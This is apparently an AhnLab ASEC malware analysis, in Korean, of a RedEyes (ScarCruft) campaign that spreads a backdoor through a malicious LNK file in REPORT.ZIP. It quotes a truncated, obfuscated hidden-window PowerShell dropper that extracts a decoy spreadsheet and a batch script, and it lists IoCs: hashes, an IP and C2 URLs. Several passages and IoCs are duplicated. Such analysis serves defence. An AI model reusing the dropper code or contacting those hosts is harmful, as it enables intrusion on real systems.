Backdoor를 유포하는 악성 LNK : RedEyes(ScarCruft)
Contents
AhnLab Security Emergency response Center(ASEC)은 CHM 형식으로 유포되던 악성코드[1]가 LNK 형식으로 유포되고 있는 것을 확인하였다. 해당 악성코드는 mshta 프로세스를 통해 특정 url 에 존재하는 추가 스크립트를 실행하여 공격자 서버로부터 명령어를 수신받아 추가 악성 행위를 수행한다.
확인된 LNK 파일은 공격자가 정상 사이트에 악성 코드가 포함된 압축 파일을 업로드하여 유포되고 있는 것으로 확인된다.
악성 LNK 파일은 ‘REPORT.ZIP’ 파일명으로 업로드 되어 있다. 해당 파일은 <링크 파일(*.lnk)을 통해 유포되는 RokRAT 악성코드 : RedEyes(ScarCruft)>[2]에서 확인된 악성코드와 동일하게 LNK 내부에 정상 엑셀 문서 데이터와 악성 스크립트 코드가 존재한다.
따라서 ‘현황조사표.xlsx.lnk’ 파일 실행 시 파워쉘 명령어를 통해 %Temp% 폴더에 정상 문서인 ‘현황조사표.xlsx’과 악성 스크립트인 ‘PMmVvG56FLC9y.bat’ 파일이 생성 및 실행된다.
/c powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = '%temp%'};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk ^| where-object {$_.length -eq 0x18C0000} ^| Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyHWPSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = '%temp%\현황조사표.xlsx';sc $tyxkEP ([byte[]]($C5ytw ^| select -Skip …
확인된 LNK 파일은 공격자가 정상 사이트에 악성 코드가 포함된 압축 파일을 업로드하여 유포되고 있는 것으로 확인된다.
악성 LNK 파일은 ‘REPORT.ZIP’ 파일명으로 업로드 되어 있다. 해당 파일은 <링크 파일(*.lnk)을 통해 유포되는 RokRAT 악성코드 : RedEyes(ScarCruft)>[2]에서 확인된 악성코드와 동일하게 LNK 내부에 정상 엑셀 문서 데이터와 악성 스크립트 코드가 존재한다.
따라서 ‘현황조사표.xlsx.lnk’ 파일 실행 시 파워쉘 명령어를 통해 %Temp% 폴더에 정상 문서인 ‘현황조사표.xlsx’과 악성 스크립트인 ‘PMmVvG56FLC9y.bat’ 파일이 생성 및 실행된다.
/c powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = '%temp%'};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk ^| where-object {$_.length -eq 0x18C0000} ^| Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyHWPSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = '%temp%\현황조사표.xlsx';sc $tyxkEP ([byte[]]($C5ytw ^| select -Skip …
IoC
0eb8db3cbde470407f942fd63afe42b8
27f74072d6268b5d96d73107c560d852
2d444b6f72c8327d1d155faa2cca7fd7
75.119.136.207
http://75.119.136.207/config/bases/config.php
http://bian0151.cafe24.com/admin/board/1.html
27f74072d6268b5d96d73107c560d852
2d444b6f72c8327d1d155faa2cca7fd7
75.119.136.207
http://75.119.136.207/config/bases/config.php
http://bian0151.cafe24.com/admin/board/1.html